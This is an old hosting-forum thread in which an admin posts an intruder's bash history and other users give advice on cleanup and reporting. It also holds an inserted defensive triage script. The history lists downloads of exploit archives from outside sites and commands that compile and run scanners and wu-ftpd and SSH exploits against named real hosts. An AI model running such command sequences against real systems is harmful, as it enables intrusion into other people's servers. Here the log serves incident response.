Web Hosting Talk

HACKER caught red handed on my linux box..


universal2001
01-03-2002, 09:29 PM
CAN SOMEONE TELL ME WHAT THIS GUY IS DOING ON MY LINUX BOX??? IT LOOKS HIGHLY SUSPICIOUS.. I was in linux shell doing my daily chores when I decided to run the command "w".. I saw 4 instances of an account being logged in so I looked at his bash and I think he's hacking..... Try to decipher what he's doing...

With all this suspicious activity going on, I looked at his BASH and there were all these files like EXPLOIT, HACKS, etc being downloaded.. So as he was continuing all of this, I decided to broadcast a message server wide...This is the msg I broadcast..

Broadcast message from root:
We monitor all suspicious activity.

As soon as I did that, he just stopped everything.. from all 4 connections.. I just saw "-bash" and nothing else.. Afterwards, he just logged off..


HIS WHOLE BASH_HISTORY....


./ft www.namkang.co.kr
PuTTY www.namkang.co.kr
ls -la
./sco lia.ac.id
ls -la
nslookup uph.edu
nslookup www.uph.edu
nslookup www.uph.edu
pico locale.c
gcc -o locale locale.c
ls -la
gcc -o lo locale.c
pico locale.c
pico locale.c
gcc -o lo locale.c
pico locale.c
gcc -o lo locale.c
ico alpd
pico alpd.c
gcc -o alpd.c alp
gcc -o alp alpd.c
ls -la
alpd
./alpd
alp
./alp
alp 24.1
./alp 24.1
./alp 202.53.225.133
./alp a
./alp 202.53
ls -la
rm id.log
telnet www.faithradio.com
209.207.253.67./ft
ls -la
./ft
PuTTY
./su
./wu
./wu -h
./wu -t 209.207.253.67
pico ani.c
gcc -o ani ani.c
./ani
./ani www.faithradio.com
ls -la
./ani www.faithradio.com
id
./tembak 202.152.37.58 53
./tembak 65.168.52.33 53
./tembak 65.168.52.33 53 |w
cd domba
ls -la
./btx www.richardpaul.com
./btx www.reseparkera.nu
./btx bsd1.golffans.com
./btx faithradio.com
./btx www.faithradio.com
./btx oficinas.socoada.com.mx
./sco oficinas.socoada.com.mx
./sco www.mdlawnet.com
./sco www.lighthouse-studios.com
ftp thugscript.net
ls -la
./apache
./apache
chmod +x apache
ls -la
./apache
./apache 130.94.172.9
./apache 130.94.172.9
chmod +x wu
./wu
try -h
-h
./wu -h
./wu id >> id.log
./wu 130.94.172.9
./wu -t 130.94.172.9
./wu -tl 130.94.172.9 sukses
./wu -t 130.94.172.9
(./wu -p 2 -d 0xff4 ; cat
ls -la
]
/wu -p 2 -d 0xff4 ; cat
./wu -p 2 -d 0xff4 ; cat
pico c.c
gcc -o c c.c -lrpcsvc -lnsl -lsocket
ls -la
./wu
./wu -t 165.34.678
pico tembak.c
gcc -o tembak tembak.c
./tembak
./tembak 202.53.225.133 53
./tembak 65.168.52.33 53
LS -LA
ls -la
cd domba
ls -la
pico sco.c
gcc -o sco sco.c
ls -la
./sco www.k-times.com
./sco oficinas.socoada.com.mx
./sco oficinas.socoada.com.mx
./sco oficinas.socoada.com.mx
./sco oficinas.socoada.com.mx
./sco www.gtaaaco.org
./sco sigma.cav.udesc.br
./sco ptsb.plateau.com.my
./sco mail.comab.com.br
./sco mail.comab.com.br
./sco unix.harrisondigital.com
./sco sail.nic.in
./sco www.shayne.com.tw
./sco www.mvp.gov.ba
cd domba
ls -la
cd Linux
ls -la
lynx http://packetstormsecurity.org/0012-exploits/7350wu-v5.tar.gz
ls -la
tar -zxvf 7350wu-v5.tar.gz
ls -la
cd
cd 7350wu
cd 7350wu
ls -la
cd domba
cd Linux
cd 7350wu
ls -la
pwd
cp 7350wu.c /home/ihcrew/domba/Linux/
cd ..
ls -la
cd vetescan
ls -la
cp z0ne /home/ihcrew/domba/Linux/
cd ..
pwd
ls -la
./zone tw -o >> tw.log
./z0ne tw -o >> tw.log
cd ..
W
w
ps aux
ftp thugscript.net
ls
ls -la
cd domba
ls -la
pico us.pl
ls -la
chmod +x us.pl
/perl us.pl handbag.com
./perl us.pl handbag.com
./us.pl handbag.com
ls -la
mkdir bsd
cp bsd.c msd
cp bsd.c bsd
ls -la
rm *.c
ls -la
mkdir unix
pico sco.c
ls -la
mkdir ssh
cd ssh
lynx http://www.rootshell.be/~revolt/exploit/ssh/scanssh-1.6.tar.gz
ls -la
lynx http://www.rootshell.be/~revolt/exploit/ssh/scanssh-1.6.tar.gz
ls -la
tar -zxvf scanssh-1.6.tar.gz
ls -la
cd scanssh
ls -la
gcc -o scanssh scanssh.c
ls -la
cd CVS
ls -la
./Root
chmod +x Root
ls -la
./Root
ls -la
cd ..
ls -la
cd missing
ls -la
cd .
ls -la
ls -la
cd ..
ls -la
cd ..
lynx http://www.rootshell.be/~revolt/exploit/ssh/ssh-crc.tar.gz
tar -zxvf ssh-crc.tar.gz
ls -la
mv ssh-crc sshc
ls -la
cd sshc
ls -la
cat readme.txt
ls -la
gcc -o xp xpl.c
chmod+x xp
chmod +x xp
./xp 30988 0 114200 117280 127.0.0.1 22 3
ls -la
cd ..
cd ..
ls -la
mkdir Linux
cd Linux
pico apache.c
pico apache.c
gcc -o apac apache.c
chmod +x apac
./apac
pwd
lynx
lyns http://packetstormsecurity.org/UNIX/scanners/vetescan/VeteScan-12-26-99.tar.gz
lynx http://packetstormsecurity.org/UNIX/scanners/vetescan/VeteScan-12-26-99.tar.gz
ls -la
tar -zxvf VeteScan-12-26-99.tar.gz
ls -la
cd vetescan
ls -la
./z0ne il -o >> il.log
ls -la
cat il.log
cp il.log /home/ihcrew/domba/Linux/
cd ..
ls -la
gcc -o 73 7350wu.c
ls -la
cd 7350wu.c
cd 7350wu
ls -la
cp network.h /home/ihcrew/domba/Linux/
cd ..
ls -la
gcc -o 73 7350wu.c
ls -la
cd 7350wu
ls -la
./make
make
ls -la
cd vetescan
cp 7350wu /home/ihcrew/domba/Linux/
cd ..
ls -la
rm 7350wu.c
cd 7350wu
ls -la
mv 7350wu 73
ls -la
cp 73 /home/ihcrew/domba/Linux/
cd ..
ls -la
pico wu-scan.c
gcc -o wu wu-scan.c
ls -la
./wu-scan il.log
./wu-scan il.log ./wu-scan il.log
cat wu-scan.log | grep vulnerable./wu i
./wu il.log
ls -la
cat wu-scan.log | grep vulnerable
cat wu-scan.log
./73 -t -h 132.66.32.10
cd 7350wu
ls -la
gcc -o net network.c
ls -la
ls -la
cd ..
ls -la
pico wuftpd2600.c
ls -la
gcc -o wuftp wuftpd2600.c
ls -la
lynx http://packetstormsecurity.org/Exploit_Code_Archive/wuftpd-sploit.tar.gz
ls -la
tar -zxvf wuftpd-sploit.tar.gz
ls
cd wuftpd-sploit
ls -la
makefile
make
./make
pwd
cp wuftpd /home/ihcrew/domba/Linux/
cd ..
cd Linux
ls -la
cat wu-scan.log
./wuftpd 132.66.32.10
./wuftpd -t -p -u -f 132.66.32.10
cd 132.66.32.10
cd wuftpd-sploit
ls -la
gcc -o port port.c
ls -la
cd ..
pico wuf.c
ls -la
gcc -o wuf wuf.c
ls -la
rm wuftpd2600.c
rm wuf.c
pico wuftp.c

----

This is where he received the broadcast message and a few mins later was idle, then after 5mins he logged off all 4 connections.. all different IP addresses..

:(

The Prohacker
01-03-2002, 09:45 PM
Well as long as he wasn't logged in as root, you should be OK, if he was, then you need to contact your host, to talk about rebuilding the /usr folder, to make sure he didn't install a root kit....

Tim Greer
01-03-2002, 09:46 PM
Well, that person was definitely up to no good. And, as with all the people I see like that user's activities, they didn't have much of a clue of what they were doing. However, the fact does remain that they downloaded and ran a few exploits and they might have managed to successfully run one of them and gain root. I'd suggest you check and make sure that nothing was compromised. Check the date on any common files to see if they've been changed and trojaned, such as ls, ps, top, etc. Also, check the date and for any strange files in your rc.d and init dirs and files. Check dmesg to see if you are running in promiscuous mode and check to see that there's no new users in your passwd file with the user or group of 0, etc. Also, check the logs to make sure they are there and check to see if this user's IP block has logged into anywhere else. (check system logs, as well as the web server logs, because crackers often leave tracks there and don't remove them). Put an * asterisk at the beginning of their shadowed password to invalidate their account and check to make sure that this user is the account holder and not someone that has their account compromised.

Finally, firewall that cracker's IP block and report them. Of course, there's other steps to take, but do your checking and make sure you clean stuff up and prevent them from getting back in. Save all the evidence in a root owned dir that denies anyone else permission, and copy the logs. Try and see how they got in, if it's not the user themselves trying to screw around. Again, there's more to it, but that is a start for now...
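The checks in the reply above (UID/GID 0 accounts in passwd, invalidating a shadow entry with a leading asterisk, promiscuous-mode notices in dmesg, and files in bin or rc.d changed after a known-good date) written out as POSIX shell functions. This is an added example, not code from the thread or from any poster; every function takes file paths as arguments so it can be tried against the constructed sample files that `make_samples` writes (made-up users, hashes and timestamps), and on a real box you would point the same functions at /etc/passwd, /etc/shadow, the output of dmesg, and /bin, /sbin, rc.d and init.d.

```shell
#!/bin/sh
# Added example, not from the thread. Post-incident triage helpers for the
# checks listed in the reply. Paths are parameters so the functions work on
# constructed samples as well as on live /etc files.

# Accounts other than root whose UID or GID is 0 (a classic backdoor user).
find_uid0_accounts() {  # $1 = passwd file
    awk -F: '($3 == 0 || $4 == 0) && $1 != "root" { print $1 }' "$1"
}

# Exit 0 if the user's shadow entry is locked ('*' or '!' prefix), 1 otherwise.
shadow_locked() {  # $1 = shadow file, $2 = user name
    awk -F: -v u="$2" '
        $1 == u { found = 1; c = substr($2, 1, 1); locked = (c == "*" || c == "!") }
        END { if (found && locked) exit 0; exit 1 }' "$1"
}

# Invalidate an account by prefixing its hash with '*', as the reply suggests.
# Writes a new file ($3) instead of editing in place; on a live system prefer
# `usermod -L user`, which does the same thing with proper file locking.
lock_account() {  # $1 = shadow in, $2 = user name, $3 = shadow out
    awk -F: -v OFS=: -v u="$2" '
        $1 == u && substr($2, 1, 1) != "*" && substr($2, 1, 1) != "!" { $2 = "*" $2 }
        { print }' "$1" > "$3"
}

# Interfaces the kernel reported entering promiscuous mode (sniffer indicator).
promisc_interfaces() {  # $1 = file holding dmesg output
    grep -o '[A-Za-z][A-Za-z0-9]* entered promiscuous mode' "$1" | awk '{ print $1 }' | sort -u
}

# Regular files under a directory modified after a reference file. Run it
# against /bin, /sbin and the rc.d/init.d dirs with a reference whose mtime
# predates the suspicious logins to spot trojaned ls/ps/top or new startup files.
modified_since() {  # $1 = directory, $2 = reference file
    find "$1" -type f -newer "$2" | sort
}

# Constructed sample inputs written into $1 (made-up users, hashes, timestamps).
make_samples() {  # $1 = target directory
    d="$1"
    mkdir -p "$d/rc.d" "$d/bin"
    printf 'root:x:0:0:root:/root:/bin/bash\n'            >  "$d/passwd"
    printf 'ihcrew:x:1001:1001::/home/ihcrew:/bin/bash\n'  >> "$d/passwd"
    printf 'toor:x:0:0::/:/bin/sh\n'                       >> "$d/passwd"
    printf 'root:$1$abc$hash:11689:0:99999:7:::\n'         >  "$d/shadow"
    printf 'ihcrew:$1$def$hash:11689:0:99999:7:::\n'       >> "$d/shadow"
    printf 'toor:$1$ghi$hash:11689:0:99999:7:::\n'         >> "$d/shadow"
    printf 'eth0: link up\n'                               >  "$d/dmesg"
    printf 'device eth0 entered promiscuous mode\n'        >> "$d/dmesg"
    # Reference dated before the incident; ls is older than it, ps and rc.local newer.
    touch -t 200112010000 "$d/reference"
    touch -t 200111150000 "$d/bin/ls"
    touch -t 200201031200 "$d/bin/ps"
    touch -t 200201031205 "$d/rc.d/rc.local"
}

# Demo run over the constructed samples.
T=$(mktemp -d)
make_samples "$T"
echo "UID/GID 0 accounts besides root:"; find_uid0_accounts "$T/passwd"
echo "Interfaces in promiscuous mode:";  promisc_interfaces "$T/dmesg"
echo "Files changed after the reference date:"
modified_since "$T/bin" "$T/reference"; modified_since "$T/rc.d" "$T/reference"
lock_account "$T/shadow" ihcrew "$T/shadow.locked"
shadow_locked "$T/shadow.locked" ihcrew && echo "ihcrew is now locked"
rm -rf "$T"
```

The mtime check is only a first pass: an attacker who has root can reset timestamps, so on a live system back it up with a package-manager verification (`rpm -V` or `debsums`) or a known-good hash list, and read the logs from a copy saved to a root-only directory as the reply recommends.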

bitserve
01-04-2002, 02:23 AM
Who knows with all of the weird names of the programs that he was compiling on what they actually do, without looking at them, but it looks more like he was setting up a base for attacking other systems than rooting yours.

I visited a few of the URLs that he ran programs against, and some of the web sites have been defaced.

You definitely should cancel the user's account, and even notify the authorities, and start getting as much information as you can on the user.

They're probably using a stolen credit card, too.

http://www.richardpaul.com/ is one of the sites defaced.

Tim Greer
01-04-2002, 02:49 AM
It does also show that local exploits and programs were run against the localhost. Also, that a lot of crackers will not usually try and attack other hosts from yours, unless they've owned you beforehand, or unless they are just using your server for an attack launch pad, which means they are probably connecting from a rooted system anyway. Again, make sure that's not a user's account being compromised, as a lot of users don't protect their passwords well, usually, or choose simple passwords. Someone could have compromised someone's account to use to attack other servers. You can almost bet that this person was logging in from a rooted system that will not result in any way of tracking where they actually came from. Contact the servers that were being attacked, as well as the servers that were connecting to your system. They likely don't know they've been compromised and you can remove some of the access this cracker has to their systems and on down the line. They can act quicker than any authorities and can gather evidence, if there's any there to gather.

davidb
01-04-2002, 03:12 AM
Yep, report that fool. Search this forum, at one point (long time ago, couple of months) I think someone listed a link to the FBI computer crimes section, where you can file this. It also might be listed on cert. On another note, I saw that site defaced. Why don't they add an address to that description of their group while at it. I mean god, look at what info they gave.

bobcares
01-04-2002, 05:15 AM
HI!
I guess the first thing you must do is cancel his account. Then tell him that he has violated the TOS and scare him.... :)
Also change your root password and other passwords if possible and see if everything is working fine....
Have a great day :)

regards
amar

Jag
01-04-2002, 06:14 AM
Of course if he owns the server anyway then a root password change really isn't going to do much but its still something you should do. But do it after to make sure no other users were changed to root access in the passwd file.

universal2001
01-04-2002, 08:56 AM
The same guy bought 3x $100/mo plans..

MattG
01-04-2002, 11:00 AM
If he did, that is good stuff to take to the FBI. Assuming it wasn't his CC #.